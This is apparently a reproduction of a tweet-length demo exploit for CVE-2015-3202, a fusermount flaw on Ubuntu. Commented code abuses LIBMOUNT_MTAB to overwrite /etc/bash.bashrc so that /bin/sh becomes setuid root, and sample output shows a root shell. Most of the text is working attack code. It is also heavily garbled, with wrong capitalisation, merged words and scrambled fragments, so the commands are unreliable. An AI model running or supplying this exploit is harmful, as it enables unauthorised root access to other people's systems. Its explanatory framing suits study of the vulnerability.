cve-2015-3202 Exploit Demo

# Making a demo exploit for cve-2015-3202 on Ubuntu fit in a tweet. 1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901 2345678901234567890 a=/tmp/.$$;b=chmod\ U+sx;echo $b/bin/sh> $a; $b $a; a+=\; $a; mkdir-p $a; LIBMOUNT_MTAB=/ETC/$0.$0RC _fuse_commfd=0 Fusermount $a #CVE -2015-3202 # Here $a holds the name of a Shel
Lscript to is executed as # root.

a=/tmp/.$$; # $b is used twice, the contents of Shellscript $a, and then as # a command-make $a executable.
Quotes are unused to save a character, so # The seperator must is escaped.

B=chmod\ u+sx; # Build the Shellscript $a, which should contain "chmod u+sx/bin/sh", making #/bin/sh setuid root.
This debian/ubuntu because they use dash, # and dont make it drop privileges.

# # HTTP://WWW.OPENWALL.COM/LISTS/OSS-SECURITY/2013/08/22/12 # echo $b/bin/sh> $a; # now make the $a script executable using the command in $b. This needlessly # sets the setuid bit and but that doesn ' t does any harm.

$b $a; # now make $a ' directory we want Fusermount to-use.  This directory name was # written to a arbitrary file as part of the vulnerability and so needs to be # formed such that it ' s
A valid shell command.

a+=\; $a;
# Create The mount point for Fusermount.

Mkdir-p $a; # Fusermount calls Setuid (Geteuid ()) to reset the ruid as it invokes #/bin/mount so, it can use privileged Mount op tions that are normally # restricted if Ruid!=.
That's acceptable (but scary) in theory, because # fusermount can sanitize it safe.  # # However, because Mount thinks it ' s being invoked by Root, it allows # access to debugging via the features
That is would not normally is # Safe for unprivileged users and Fusermount doesn ' t sanitize them. # # Therefore, the bug is ' that ' environment is not cleared ' when calling Mount # with Ruid=0. One debugging feature available is changing the location of # /etc/mtab by setting Libmount_mtab, which we can abuse to overwrite arbitrary # files. # in this case, I'm ' m trying to OVERWRITE/ETC/BASH.BASHRC (using the name of the # Current shell-$0...so it only wor
KS If you ' re using bash!). # the line written by Fusermount'll look like this: #/dev/fuse/tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx # Which W Ill try to execute/dev/fuse with the paramter/tmp/_, fail because #/dev/fuse is a device node, and then With the parameters fuse # xxx,xxx,xxx,xxx. This means executing/bin/sh would give you a root shell, the # next time root logs in. # Another way to exploit it would Be Overwriting/etc/default/locale, then # Waiting for Cron to run/etc/cron.daily/apt at midnight.
That's means root # wouldn ' t have to log in and but you would have to wait around until midnight to # Check if it worked.
# and we have enough characters left for a hash tag/comment. LIBMOUNT_MTAB=/ETC/$0.$0RC _fuse_commfd=0 fusermount $a #CVE-2015-3202 # Here's how the exploit looks $a u+sx;echo $b/bin/sh> $b $a; a+=\ $a; mkdir-p. $a; LIBMOUNT_MTAB=/ETC/$0.$0RC _fuse_commfd=0 Fusermount $a #CVE -2015-3202 # fusermount:failed to Open/etc/fuse.conf:permi  Ssion denied # sending file Descriptor:socket operation on Non-socket # $ CAT/ETC/BASH.BASHRC #/dev/fuse/tmp/_;/tmp/_  Fuse Rw,nosuid,nodev,user=taviso 0 0 # Now, root logs in next ... # $ sudo-s # bash:/dev/fuse:permission denied # # ls-ll/bin/sh #-rwsr-xr-x 1 root root 121272 Feb 2014/bin/sh # exit # $ Sh-c ' id ' # euid=0 (root) groups=0 (roo T) # to repair the damage after testing, doing this: # # $ sudo rm/etc/bash.bashrc # $ sudo apt-get Install-o ns::= "--force-confmiss"--reinstall-m Bash # $ sudo chmod 0755/bin/sh # $ sudo umount/tmp/.$$\;/tmp/.$$ # $ rm-rf/tmp
/.$$/tmp/.$$\; #